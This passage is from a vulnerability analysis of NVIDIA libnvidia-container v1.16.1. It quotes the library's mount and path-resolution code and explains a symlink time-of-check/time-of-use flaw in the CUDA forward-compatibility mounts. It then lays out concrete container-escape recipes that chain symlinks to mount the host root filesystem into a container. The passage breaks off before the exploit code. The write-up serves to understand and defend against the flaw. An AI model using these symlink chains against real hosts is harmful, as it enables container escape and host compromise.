        if (libnvc.mig_monitor_global_caps_mount(nvc, cnt) < 0) {
            warnx("mount error: %s", libnvc.error(nvc));
            goto fail;
        }
        for (size_t i = 0; i < mig_monitor_devices.ngpus; ++i) {
            if (libnvc.device_mig_caps_mount(nvc, cnt, mig_monitor_devices.gpus[i]) < 0) {
                warnx("mount error: %s", libnvc.error(nvc));
                goto fail;
            }
        }
    }
    for (size_t i = 0; i < nvc_cfg->imex.nchans; ++i) {
        if (libnvc.imex_channel_mount(nvc, cnt, &nvc_cfg->imex.chans[i]) < 0) {
            warnx("mount error: %s", libnvc.error(nvc));
            goto fail;
        }
    }
    ...
    if (libnvc.ldcache_update(nvc, cnt) < 0) {
        warnx("ldcache error: %s", libnvc.error(nvc));
        goto fail;
    }
    ...
}
2.8 libnvidia-container's nvc_driver_mount mounts the relevant files
nvc_driver_mount() mounts:
- procfs: the relevant files under the host's /proc/driver/nvidia into the container
- app_profile: the host configuration files under /etc/nvidia/nvidia-application-profiles-rc.d into the container
- Host binaries and libraries: host binaries and dependent libraries into the container
- Container library mounts: for forward compatibility, users may ship newer CUDA libraries; the newer CUDA libraries under the container's /usr/local/cuda/compat directory are mounted into the container's lib directory
- Firmware: the relevant files under the host's /lib/firmware/nvidia into the container
- IPC: the host's /var/run/nvidia-persistenced/socket into the container
- Devices: the host's /dev/nvidia-uvm and /dev/nvidia-uvm-tools into the container
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L712
int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
    ...
    if (ns_enter(&ctx->err, cnt->mnt_ns, CLONE_NEWNS) < 0)
        return (-1);
    ...
    /* Procfs mount */
    if (ctx->dxcore.initialized)
        log_warn("skipping procfs mount on WSL");
    else if ((*ptr++ = mount_procfs(&ctx->err, ctx->cfg.root, cnt)) == NULL)
        goto fail;

    /* Application profile mount */
    if (cnt->flags & OPT_GRAPHICS_LIBS) {
        if (ctx->dxcore.initialized)
            log_warn("skipping app profile mount on WSL");
        else if ((*ptr++ = mount_app_profile(&ctx->err, cnt)) == NULL)
            goto fail;
    }

    /* Host binary and library mounts */
    if (info->bins != NULL && info->nbins > 0) {
        if ((tmp = (const char **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.bins_dir, info->bins, info->nbins)) == NULL)
            goto fail;
        ptr = array_append(ptr, tmp, array_size(tmp));
        free(tmp);
    }
    if (info->libs != NULL && info->nlibs > 0) {
        if ((tmp = (const char **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs_dir, info->libs, info->nlibs)) == NULL)
            goto fail;
        ptr = array_append(ptr, tmp, array_size(tmp));
        free(tmp);
    }
    if ((cnt->flags & OPT_COMPAT32) && info->libs32 != NULL && info->nlibs32 > 0) {
        if ((tmp = (const char **)mount_files(&ctx->err, ctx->cfg.root, cnt, cnt->cfg.libs32_dir, info->libs32, info->nlibs32)) == NULL)
            goto fail;
        ptr = array_append(ptr, tmp, array_size(tmp));
        free(tmp);
    }
    if (symlink_libraries(&ctx->err, cnt, mnt, (size_t)(ptr - mnt)) < 0)
        goto fail;

    /* Container library mounts */
    if (cnt->libs != NULL && cnt->nlibs > 0) {
        size_t nlibs = cnt->nlibs;
        char **libs = array_copy(&ctx->err, (const char * const *)cnt->libs, cnt->nlibs);
        if (libs == NULL)
            goto fail;

        filter_libraries(info, libs, &nlibs);
        if ((tmp = (const char **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
            free(libs);
            goto fail;
        }
        ptr = array_append(ptr, tmp, array_size(tmp));
        free(tmp);
        free(libs);
    }

    /* Firmware mounts */
    for (size_t i = 0; i < info->nfirmwares; ++i) {
        if ((*ptr++ = mount_firmware(&ctx->err, ctx->cfg.root, cnt, info->firmwares[i])) == NULL) {
            log_errf("error mounting firmware path %s", info->firmwares[i]);
            goto fail;
        }
    }

    /* IPC mounts */
    for (size_t i = 0; i < info->nipcs; ++i) {
        /* XXX Only utility libraries require persistenced or fabricmanager IPC, everything else is compute only. */
        if (str_has_suffix(NV_PERSISTENCED_SOCKET, info->ipcs[i]) ||
            str_has_suffix(NV_FABRICMANAGER_SOCKET, info->ipcs[i])) {
            if (!(cnt->flags & OPT_UTILITY_LIBS))
                continue;
        } else if (!(cnt->flags & OPT_COMPUTE_LIBS))
            continue;
        if ((*ptr++ = mount_ipc(&ctx->err, ctx->cfg.root, cnt, info->ipcs[i])) == NULL)
            goto fail;
    }

    /* Device mounts */
    for (size_t i = 0; i < info->ndevs; ++i) {
        /* On WSL2 we only mount the /dev/dxg device and as such these checks are not applicable. */
        if (!ctx->dxcore.initialized) {
            /* XXX Only compute libraries require specific devices (e.g. UVM). */
            if (!(cnt->flags & OPT_COMPUTE_LIBS) && major(info->devs[i].id) != NV_DEVICE_MAJOR)
                continue;
            /* XXX Only display capability requires the modeset device. */
            if (!(cnt->flags & OPT_DISPLAY) && minor(info->devs[i].id) == NV_MODESET_DEVICE_MINOR)
                continue;
        }
        if (!(cnt->flags & OPT_NO_DEVBIND)) {
            if ((*ptr++ = mount_device(&ctx->err, ctx->cfg.root, cnt, &info->devs[i])) == NULL)
                goto fail;
        }
        if (!(cnt->flags & OPT_NO_CGROUPS)) {
            if (setup_device_cgroup(&ctx->err, cnt, info->devs[i].id) < 0)
                goto fail;
        }
    }
    rv = 0;

 fail:
    if (rv < 0) {
        for (size_t i = 0; mnt != NULL && i < nmnt; ++i)
            unmount(mnt[i]);
        assert_func(ns_enter_at(NULL, ctx->mnt_ns, CLONE_NEWNS));
    } else {
        rv = ns_enter_at(&ctx->err, ctx->mnt_ns, CLONE_NEWNS);
    }
    array_free((char **)mnt, nmnt);
    return (rv);
}
2.9 Mounting the container's CUDA library files
We focus on the container-to-container mount operation, i.e. the CUDA forward-compatibility feature.
The CUDA library files collected from inside the container (cnt->libs) are filtered by filter_libraries and then mounted into the container.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10
int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
    ...
    /* Container library mounts */
    if (cnt->libs != NULL && cnt->nlibs > 0) {
        size_t nlibs = cnt->nlibs;
        char **libs = array_copy(&ctx->err, (const char * const *)cnt->libs, cnt->nlibs);
        if (libs == NULL)
            goto fail;

        filter_libraries(info, libs, &nlibs);
        if ((tmp = (const char **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
            free(libs);
            goto fail;
        }
        ptr = array_append(ptr, tmp, array_size(tmp));
        free(tmp);
        free(libs);
    }
    ...
}
Here cnt->libs contains the container's /usr/local/cuda/compat/lib*.so.* files.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L61
static int
find_library_paths(struct error *err, struct nvc_container *cnt)
{
    char path[PATH_MAX];
    glob_t gl;
    int rv = -1;
    char **ptr;

    if (!(cnt->flags & OPT_COMPUTE_LIBS))
        return (0);

    if (path_resolve_full(err, path, cnt->cfg.rootfs, cnt->cfg.cudart_dir) < 0)
        return (-1);
    if (path_append(err, path, "compat/lib*.so.*") < 0)
        return (-1);
    if (xglob(err, path, GLOB_ERR, NULL, &gl) < 0)
        goto fail;

    if (gl.gl_pathc > 0) {
        cnt->nlibs = gl.gl_pathc;
        cnt->libs = ptr = array_new(err, gl.gl_pathc);
        if (cnt->libs == NULL)
            goto fail;
        for (size_t i = 0; i < gl.gl_pathc; ++i) {
            if (path_resolve(err, path, cnt->cfg.rootfs, gl.gl_pathv[i] + strlen(cnt->cfg.rootfs)) < 0)
                goto fail;
            if (!str_array_match(path, (const char * const *)cnt->libs, (size_t)(ptr - cnt->libs))) {
                log_infof("selecting %s%s", cnt->cfg.rootfs, path);
                if ((*ptr++ = xstrdup(err, path)) == NULL)
                    goto fail;
            }
        }
        array_pack(cnt->libs, &cnt->nlibs);
    }
    rv = 0;

 fail:
    globfree(&gl);
    return (rv);
}
The filter_libraries function only keeps (and therefore mounts) libraries that satisfy both of the following conditions:
1. the file name contains .so.
2. the version number does not match the host CUDA library version
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L562
static void
filter_libraries(const struct nvc_driver_info *info, char * paths[], size_t *size)
{
    char *lib, *maj;

    /*
     * XXX Filter out any library that matches the major version of RM to prevent us from
     * running into an unsupported configurations (e.g. CUDA compat on Geforce or non-LTS drivers).
     */
    for (size_t i = 0; i < *size; ++i) {
        lib = basename(paths[i]);
        if ((maj = strstr(lib, ".so.")) != NULL) {
            maj += strlen(".so.");
            if (strncmp(info->nvrm_version, maj, strspn(maj, "0123456789")))
                continue;
        }
        paths[i] = NULL;
    }
    array_pack(paths, size);
}
3. Vulnerability Analysis
3.1 Locating the vulnerability
First, posit the intended effect of the vulnerability: mounting an arbitrary file from the host into the container. Achieving this requires that the source address of a mount be controllable.
According to the call-chain analysis in section 2, the CUDA forward-compatibility feature offers exactly such an opportunity: it mounts files from the container into the container.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L767C1-L782C10
int
nvc_driver_mount(struct nvc_context *ctx, const struct nvc_container *cnt, const struct nvc_driver_info *info)
{
    ...
    /* Container library mounts */
    if (cnt->libs != NULL && cnt->nlibs > 0) {
        size_t nlibs = cnt->nlibs;
        char **libs = array_copy(&ctx->err, (const char * const *)cnt->libs, cnt->nlibs);
        if (libs == NULL)
            goto fail;

        filter_libraries(info, libs, &nlibs);
        if ((tmp = (const char **)mount_files(&ctx->err, cnt->cfg.rootfs, cnt, cnt->cfg.libs_dir, libs, nlibs)) == NULL) {
            free(libs);
            goto fail;
        }
        ptr = array_append(ptr, tmp, array_size(tmp));
        free(tmp);
        free(libs);
    }
    ...
}
If a lib path is a symlink pointing at a host directory, and nothing downstream guards against this, the desired effect may be achievable.
The mount itself has little protection; the only requirement is passing the match_binary_flags() (or match_library_flags()) check.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L100
static char **
mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size)
{
    char src[PATH_MAX];
    char dst[PATH_MAX];
    mode_t mode;
    char *src_end, *dst_end, *file;
    char **mnt, **ptr;

    if (path_new(err, src, root) < 0)
        return (NULL);
    if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)
        return (NULL);
    if (file_create(err, dst, NULL, cnt->uid, cnt->gid, MODE_DIR(0755)) < 0)
        return (NULL);

    src_end = src + strlen(src);
    dst_end = dst + strlen(dst);

    mnt = ptr = array_new(err, size + 1); /* NULL terminated. */
    if (mnt == NULL)
        return (NULL);

    for (size_t i = 0; i < size; ++i) {
        file = basename(paths[i]);
        if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags))
            continue;
        if (path_append(err, src, paths[i]) < 0)
            goto fail;
        if (path_append(err, dst, file) < 0)
            goto fail;
        if (file_mode(err, src, &mode) < 0)
            goto fail;
        if (file_create(err, dst, NULL, cnt->uid, cnt->gid, mode) < 0)
            goto fail;
        log_infof("mounting %s at %s", src, dst);
        if (xmount(err, src, dst, NULL, MS_BIND, NULL) < 0)
            goto fail;
        if (xmount(err, NULL, dst, NULL, MS_BIND|MS_REMOUNT | MS_RDONLY|MS_NODEV|MS_NOSUID, NULL) < 0)
            goto fail;
        if ((*ptr++ = xstrdup(err, dst)) == NULL)
            goto fail;
        *src_end = '\0';
        *dst_end = '\0';
    }
    return (mnt);

 fail:
    for (size_t i = 0; i < size; ++i)
        unmount(mnt[i]);
    array_free(mnt, size);
    return (NULL);
}
What remains is straightforward:
1. Find which files count as "libs" => find_library_paths(), filter_libraries()
2. Turn the target file into a symlink pointing at a host file, so that the later mount brings the host file into the container
3. Satisfy the match_binary_flags() or match_library_flags() check
4. Reach the actual mount operation
3.2 Data format analysis
Let us analyze the constraints imposed by find_library_paths(), filter_libraries(), match_binary_flags(), and match_library_flags().
3.2.1 find_library_paths()
TL;DR:
1. The paths of interest are the container's /usr/local/cuda/compat/lib*.so.* paths
2. Symlinks are resolved before paths are added to cnt->libs
3. Note: the process has not yet joined the container's mount namespace at this point

By default, find_library_paths() searches for libs in the container rootfs under /usr/local/cuda/compat/lib*.so.*.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L73
static int
find_library_paths(struct error *err, struct nvc_container *cnt)
{
    char path[PATH_MAX];
    glob_t gl;
    int rv = -1;
    char **ptr;

    if (!(cnt->flags & OPT_COMPUTE_LIBS))
        return (0);

    if (path_resolve_full(err, path, cnt->cfg.rootfs, cnt->cfg.cudart_dir) < 0)
        return (-1);
    if (path_append(err, path, "compat/lib*.so.*") < 0)
        return (-1);
    if (xglob(err, path, GLOB_ERR, NULL, &gl) < 0)
        goto fail;

    if (gl.gl_pathc > 0) {
        ...
    }
    rv = 0;

 fail:
    globfree(&gl);
    return (rv);
}
It performs one round of symlink resolution on each target path; if a target is a symlink, resolution must succeed, and the resolved path is then added to cnt->libs.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_container.c#L85
static int
find_library_paths(struct error *err, struct nvc_container *cnt)
{
    ...
    if (gl.gl_pathc > 0) {
        cnt->nlibs = gl.gl_pathc;
        cnt->libs = ptr = array_new(err, gl.gl_pathc);
        if (cnt->libs == NULL)
            goto fail;
        for (size_t i = 0; i < gl.gl_pathc; ++i) {
            if (path_resolve(err, path, cnt->cfg.rootfs, gl.gl_pathv[i] + strlen(cnt->cfg.rootfs)) < 0)
                goto fail;
            if (!str_array_match(path, (const char * const *)cnt->libs, (size_t)(ptr - cnt->libs))) {
                log_infof("selecting %s%s", cnt->cfg.rootfs, path);
                if ((*ptr++ = xstrdup(err, path)) == NULL)
                    goto fail;
            }
        }
        array_pack(cnt->libs, &cnt->nlibs);
    }
    ...
}
do_path_resolve splits the path on '/' and resolves symlinks segment by segment; components that do not exist are kept as-is.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/utils.c#L802
static int
do_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path)
{
    int fd = -1;
    int rv = -1;
    char realpath[PATH_MAX];
    char dbuf[2][PATH_MAX];
    char *link = dbuf[0];
    char *ptr = dbuf[1];
    char *file, *p;
    unsigned int noents = 0;
    unsigned int nlinks = 0;
    ssize_t n;

    *ptr = '\0';
    *realpath = '\0';
    assert(*root == '/');

    if ((fd = open_next(err, -1, root)) < 0)
        goto fail;
    if (path_append(err, ptr, path) < 0)
        goto fail;

    while ((file = strsep(&ptr, "/")) != NULL) {
        if (*file == '\0' || str_equal(file, "."))
            continue;
        else if (str_equal(file, "..")) {
            /*
             * Remove the last component from the resolved path. If we are not below
             * non-existent components, restore the previous file descriptor as well.
             */
            if ((p = strrchr(realpath, '/')) == NULL) {
                error_setx(err, "path error: %s resolves outside of %s", path, root);
                goto fail;
            }
            *p = '\0';
            if (noents > 0)
                --noents;
            else {
                if ((fd = open_next(err, fd, "..")) < 0)
                    goto fail;
            }
        } else {
            if (noents > 0)
                goto missing_ent;
            n = readlinkat(fd, file, link, PATH_MAX);
            if (n > 0 && n < PATH_MAX && nlinks < MAXSYMLINKS) {
                /*
                 * Component is a symlink, append the rest of the path to it and
                 * proceed with the resulting buffer. If it is absolute, also clear
                 * the resolved path and reset our file descriptor to root.
                 */
                link[n] = '\0';
                if (*link == '/') {
                    ++link;
                    *realpath = '\0';
                    if ((fd = open_next(err, fd, root)) < 0)
                        goto fail;
                }
                if (ptr != NULL) {
                    if (path_append(err, link, ptr) < 0)
                        goto fail;
                }
                ptr = link;
                link = dbuf[++nlinks % 2];
            } else {
                if (n >= PATH_MAX)
                    errno = ENAMETOOLONG;
                else if (nlinks >= MAXSYMLINKS)
                    errno = ELOOP;
                switch (errno) {
                missing_ent:
                case ENOENT:
                    /* Component doesn't exist */
                    ++noents;
                    if (path_append(err, realpath, file) < 0)
                        goto fail;
                    break;
                case EINVAL:
                    /* Not a symlink, proceed normally */
                    if ((fd = open_next(err, fd, file)) < 0)
                        goto fail;
                    if (path_append(err, realpath, file) < 0)
                        goto fail;
                    break;
                default:
                    error_set(err, "path error: %s/%s", root, path);
                    goto fail;
                }
            }
        }
    }
    if (!full) {
        if (path_new(err, buf, realpath) < 0)
            goto fail;
    } else {
        if (path_join(err, buf, root, realpath) < 0)
            goto fail;
    }
    rv = 0;

 fail:
    xclose(fd);
    return (rv);
}

int
path_resolve(struct error *err, char *buf, const char *root, const char *path)
{
    return (do_path_resolve(err, false, buf, root, path));
}
Note that:
1. When find_library_paths() runs, the process has not yet joined the container's mount namespace
2. When the actual mounts are later performed, nvc_driver_mount() runs after joining the container's mount namespace

This difference can be exploited to make the two phases behave differently: a path can appear non-existent during symlink resolution in find_library_paths (so the symlink cannot be resolved), yet resolve successfully as a symlink when nvc_driver_mount runs.
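The two-phase divergence can be illustrated with a small Go sketch. This is not the library's code, just the time-of-check vs. time-of-use idea: a tolerant resolver keeps a path literally when its symlink target is missing (as do_path_resolve does for missing components), while the same path resolves through the symlink once the target exists (as happens after entering the container's mount namespace).

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// resolveOrKeep mimics the tolerant behaviour of do_path_resolve for a single
// path: if resolution fails because a component is missing, the literal path
// is kept unchanged.
func resolveOrKeep(p string) string {
	resolved, err := filepath.EvalSymlinks(p)
	if err != nil {
		return p // missing component: keep the path as-is
	}
	return resolved
}

func main() {
	dir, _ := os.MkdirTemp("", "resolve")
	defer os.RemoveAll(dir)

	link := filepath.Join(dir, "libcuda.so.999.99")
	target := filepath.Join(dir, "target")

	// Phase 1 (host mount namespace in the analogy): the symlink target
	// does not exist yet, so the path is kept literally.
	os.Symlink(target, link)
	fmt.Println(resolveOrKeep(link) == link) // true

	// Phase 2 (container mount namespace): the target now exists, so the
	// same path resolves through the symlink and the mount source differs
	// from what was checked earlier.
	os.Mkdir(target, 0o755)
	fmt.Println(resolveOrKeep(link) != link) // true
}
```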
3.2.2 filter_libraries()
filter_libraries() extracts a version number from each lib name and requires it to differ from nvrm_version: if the versions match, the library is already provided by the host driver and there is no point mounting it again.
Fabricating an arbitrary version number is enough to bypass this restriction.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_mount.c#L562
static void
filter_libraries(const struct nvc_driver_info *info, char * paths[], size_t *size)
{
    char *lib, *maj;

    /*
     * XXX Filter out any library that matches the major version of RM to prevent us from
     * running into an unsupported configurations (e.g. CUDA compat on Geforce or non-LTS drivers).
     */
    for (size_t i = 0; i < *size; ++i) {
        lib = basename(paths[i]);
        if ((maj = strstr(lib, ".so.")) != NULL) {
            maj += strlen(".so.");
            if (strncmp(info->nvrm_version, maj, strspn(maj, "0123456789")))
                continue;
        }
        paths[i] = NULL;
    }
    array_pack(paths, size);
}
3.2.3 match_binary_flags(), match_library_flags()
TL;DR:
1. Set the environment variable NVIDIA_DRIVER_CAPABILITIES=all to pass the flags & OPT_XX checks.
2. The bin/library file name must start with one of the preset prefixes.

The bin/library file name is required to begin with one of the preset prefixes.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_info.c#L755
bool
match_binary_flags(const char *bin, int32_t flags)
{
    if ((flags & OPT_UTILITY_BINS) && str_array_match_prefix(bin, utility_bins, nitems(utility_bins)))
        return (true);
    if ((flags & OPT_COMPUTE_BINS) && str_array_match_prefix(bin, compute_bins, nitems(compute_bins)))
        return (true);
    return (false);
}

bool
match_library_flags(const char *lib, int32_t flags)
{
    if (str_array_match_prefix(lib, dxcore_libs, nitems(dxcore_libs)))
        return (true);
    if ((flags & OPT_UTILITY_LIBS) && str_array_match_prefix(lib, utility_libs, nitems(utility_libs)))
        return (true);
    if ((flags & OPT_COMPUTE_LIBS) && str_array_match_prefix(lib, compute_libs, nitems(compute_libs)))
        return (true);
    if ((flags & OPT_VIDEO_LIBS) && str_array_match_prefix(lib, video_libs, nitems(video_libs)))
        return (true);
    if ((flags & OPT_GRAPHICS_LIBS) && (str_array_match_prefix(lib, graphics_libs, nitems(graphics_libs)) ||
        str_array_match_prefix(lib, graphics_libs_glvnd, nitems(graphics_libs_glvnd)) ||
        str_array_match_prefix(lib, graphics_libs_compat, nitems(graphics_libs_compat))))
        return (true);
    if ((flags & OPT_NGX_LIBS) && str_array_match_prefix(lib, ngx_libs, nitems(ngx_libs)))
        return (true);
    return (false);
}
Here, flags can be controlled through the environment variable NVIDIA_DRIVER_CAPABILITIES; setting NVIDIA_DRIVER_CAPABILITIES=all enables every driver capability.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/options.h#L82-L87
static const struct option container_opts[] = {
    ...
    {"utility", OPT_UTILITY_BINS|OPT_UTILITY_LIBS},
    {"compute", OPT_COMPUTE_BINS|OPT_COMPUTE_LIBS},
    {"video", OPT_VIDEO_LIBS|OPT_COMPUTE_LIBS},
    {"graphics", OPT_GRAPHICS_LIBS},
    {"display", OPT_DISPLAY|OPT_GRAPHICS_LIBS},
    {"ngx", OPT_NGX_LIBS},
    ...
};
The predefined prefixes are:
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/nvc_info.c#L60
static const char * const utility_bins[] = {
    "nvidia-smi",                   /* System management interface */
    "nvidia-debugdump",             /* GPU coredump utility */
    "nvidia-persistenced",          /* Persistence mode utility */
    "nv-fabricmanager",             /* NVSwitch fabric manager utility */
    //"nvidia-modprobe",            /* Kernel module loader */
    //"nvidia-settings",            /* X server settings */
    //"nvidia-xconfig",             /* X xorg.conf editor */
};

static const char * const compute_bins[] = {
    "nvidia-cuda-mps-control",      /* Multi process service CLI */
    "nvidia-cuda-mps-server",       /* Multi process service server */
};

static const char * const utility_libs[] = {
    "libnvidia-ml.so",              /* Management library */
    "libnvidia-cfg.so",             /* GPU configuration */
    "libnvidia-nscq.so",            /* Topology info for NVSwitches and GPUs */
};

static const char * const compute_libs[] = {
    "libcuda.so",                   /* CUDA driver library */
    "libcudadebugger.so",           /* CUDA Debugger Library */
    "libnvidia-opencl.so",          /* NVIDIA OpenCL ICD */
    "libnvidia-gpucomp.so",         /* Shared Compiler Library */
    "libnvidia-ptxjitcompiler.so",  /* PTX-SASS JIT compiler (used by libcuda) */
    "libnvidia-fatbinaryloader.so", /* fatbin loader (used by libcuda) */
    "libnvidia-allocator.so",       /* NVIDIA allocator runtime library */
    "libnvidia-compiler.so",        /* NVVM-PTX compiler for OpenCL (used by libnvidia-opencl) */
    "libnvidia-pkcs11.so",          /* Encrypt/Decrypt library */
    "libnvidia-pkcs11-openssl3.so", /* Encrypt/Decrypt library (OpenSSL 3 support) */
    "libnvidia-nvvm.so",            /* The NVVM Compiler library */
};

static const char * const video_libs[] = {
    "libvdpau_nvidia.so",           /* NVIDIA VDPAU ICD */
    "libnvidia-encode.so",          /* Video encoder */
    "libnvidia-opticalflow.so",     /* NVIDIA Opticalflow library */
    "libnvcuvid.so",                /* Video decoder */
};

static const char * const graphics_libs[] = {
    //"libnvidia-egl-wayland.so",   /* EGL wayland platform extension (used by libEGL_nvidia) */
    "libnvidia-eglcore.so",         /* EGL core (used by libGLES*[_nvidia] and libEGL_nvidia) */
    "libnvidia-glcore.so",          /* OpenGL core (used by libGL or libGLX_nvidia) */
    "libnvidia-tls.so",             /* Thread local storage (used by libGL or libGLX_nvidia) */
    "libnvidia-glsi.so",            /* OpenGL system interaction (used by libEGL_nvidia) */
    "libnvidia-fbc.so",             /* Framebuffer capture */
    "libnvidia-ifr.so",             /* OpenGL framebuffer capture */
    "libnvidia-rtcore.so",          /* Optix */
    "libnvoptix.so",                /* Optix */
};

static const char * const graphics_libs_glvnd[] = {
    //"libGLX.so",                  /* GLX ICD loader */
    //"libOpenGL.so",               /* OpenGL ICD loader */
    //"libGLdispatch.so",           /* OpenGL dispatch (used by libOpenGL, libEGL and libGLES*) */
    "libGLX_nvidia.so",             /* OpenGL/GLX ICD */
    "libEGL_nvidia.so",             /* EGL ICD */
    "libGLESv2_nvidia.so",          /* OpenGL ES v2 ICD */
    "libGLESv1_CM_nvidia.so",       /* OpenGL ES v1 common profile ICD */
    "libnvidia-glvkspirv.so",       /* SPIR-V Lib for Vulkan */
    "libnvidia-cbl.so",             /* VK_NV_ray_tracing */
};

static const char * const graphics_libs_compat[] = {
    "libGL.so",                     /* OpenGL/GLX legacy _or_ compatibility wrapper (GLVND) */
    "libEGL.so",                    /* EGL legacy _or_ ICD loader (GLVND) */
    "libGLESv1_CM.so",              /* OpenGL ES v1 common profile legacy _or_ ICD loader (GLVND) */
    "libGLESv2.so",                 /* OpenGL ES v2 legacy _or_ ICD loader (GLVND) */
};

static const char * const ngx_libs[] = {
    "libnvidia-ngx.so",             /* NGX library */
};

static const char * const dxcore_libs[] = {
    "libdxcore.so",                 /* Core library for dxcore support */
};
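The prefix check itself can be sketched in Python (an illustrative model with a trimmed-down copy of the tables above; the file names are made-up). The point is that only the prefix is inspected, so an attacker-chosen version suffix does not matter:

```python
def str_array_match_prefix(name: str, prefixes: list) -> bool:
    """Model of str_array_match_prefix(): true if any entry is a prefix of name."""
    return any(name.startswith(p) for p in prefixes)

# Trimmed-down copies of the whitelists above:
utility_libs = ["libnvidia-ml.so", "libnvidia-cfg.so", "libnvidia-nscq.so"]
compute_libs = ["libcuda.so", "libnvidia-opencl.so"]

print(str_array_match_prefix("libnvidia-cfg.so.113", utility_libs))          # True
print(str_array_match_prefix("libevil.so.1", utility_libs + compute_libs))   # False
```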
3.3 Exploitation
Summarizing sections "3.1 Vulnerability Point Analysis" and "3.2 Data Format Analysis", an exploit must satisfy the following conditions:
1. Place a symlink at a /usr/local/cuda/compat/lib..so. path inside the container; note that find_library_paths() resolves symlinks before returning the path.
2. The file name must (1) contain .so. and (2) carry a version number different from nvrm_version.
3. Before the mount, the file name must match one of the predefined prefixes.
To achieve escape-level impact, the mount source path must be a host path at mount time. The exploitation steps are therefore:
1. Place a symlink at a /usr/local/cuda/compat/lib..so. path inside the container.
2. Join the container's mount namespace.
3. The file name must (1) contain .so. and (2) carry a version number different from nvrm_version.
4. Before the mount, the file name must match one of the predefined prefixes.
5. At mount time, the mount source is a host path; mount(2) itself resolves symlinks, so the host path gets mounted into the container. Note the mount is performed read-only.
To satisfy step 5, the symlink should point to a host path, but then steps 2 and 3 cannot be satisfied. Two layers of symlinks are therefore needed, for example:
/usr/local/cuda/compat/libssst0n3.so.1 -> /?/libnvidia-ml.so.999 -> /HOST
1. /usr/local/cuda/compat/libssst0n3.so.1 -> /?/libnvidia-ml.so.999 satisfies steps 1, 2, 3 and 4.
2. /?/libnvidia-ml.so.999 -> /HOST satisfies step 5.
In practice, however, when find_library_paths() calls do_path_resolve() to resolve symlinks, the chain may be resolved all the way down to /X, which breaks the requirements of steps 2, 3 and 4.
Satisfying both at once is the main problem to solve, i.e. how to make:
1. do_path_resolve() resolve the symlink to /?/libnvidia-ml.so.999
2. mount resolve the symlink to /HOST
How can this be achieved? There are two approaches:
1. Construct a nonexistent path so that the first resolution stops early: when do_path_resolve() encounters a nonexistent component, it outputs the path as-is.
2. Race condition: two containers share a directory, and the symlink target is swapped dynamically to win the race.
The race condition reaches the goal easily but imposes a strict precondition on exploitation, so let us examine the feasibility of the first approach.
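The first approach hinges on this behavior of do_path_resolve(). A toy Python resolver (a simplified model that ignores file descriptors, `..` handling and symlink-loop limits) shows how one missing component makes the rest of the path come back verbatim:

```python
import os

def resolve_in_root(root, path):
    """Toy model of do_path_resolve(): follow symlinks below `root`, but once a
    component is missing, append the rest of the path verbatim (this mirrors
    the ENOENT / missing_ent branch in the C code)."""
    pending = [c for c in path.split("/") if c]
    real = []
    missing = False
    while pending:
        comp = pending.pop(0)
        cur = os.path.join(root, *real, comp)
        if missing or not os.path.lexists(cur):
            # Component does not exist: stop resolving, keep the rest as-is.
            missing = True
            real.append(comp)
            continue
        if os.path.islink(cur):
            target = os.readlink(cur)
            if target.startswith("/"):
                real = []  # absolute link target: restart from the root
            pending = [c for c in target.split("/") if c] + pending
        else:
            real.append(comp)
    return "/" + "/".join(real)
```

In the volume layout below, /volume does not yet exist under the rootfs when find_library_paths() runs, so a resolver like this returns /volume/libnvidia-ml.so.999 unresolved; once the volume is visible in the mount namespace, the same lookup follows the second symlink onward.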
Since step 1 runs before joining the container's mount namespace, there are three ways to construct a nonexistent path:
1. (ssst0n3) Mounted volume: /usr/local/cuda/compat/libssst0n3.so.1 -> /volume/libnvidia-ml.so.999 -> /
2. (ssst0n3) procfs: /usr/local/cuda/compat/libssst0n3.so.1 -> /proc/?/libnvidia-ml.so.999 -> /
3. (ym) Use a directory plus a file to construct two mounts: /usr/local/cuda/compat/libnvidia-cfg.so.111/libnvidia-cfg.so.112 -> /, and /usr/local/cuda/compat/libnvidia-cfg.so.113 -> /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112
For the first two approaches (volume and procfs):
1. Before entering the container's mount namespace, /volume and /proc under the container rootfs are empty directories, satisfying steps 1, 2, 3 and 4.
2. After entering the container's mount namespace, the /volume and /proc mount points become visible, and the symlinks underneath them exist.
For the third approach (two mounts):
1. find_library_paths() first collects all paths to process and only then performs the mounts, so two mounts can be constructed such that the first mount changes the directory environment seen by the second.
2. The paths found by find_library_paths() include directories.
3. Before the mounts are performed, the directory /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/ does not exist, satisfying steps 1, 2, 3 and 4.
4. After the directory /usr/local/cuda/compat/libnvidia-cfg.so.111 is mounted, /usr/lib/x86_64-linux-gnu/libnvidia-cfg.so.111/libnvidia-cfg.so.112 is a symlink pointing to the host.
3.3.1 The volume method
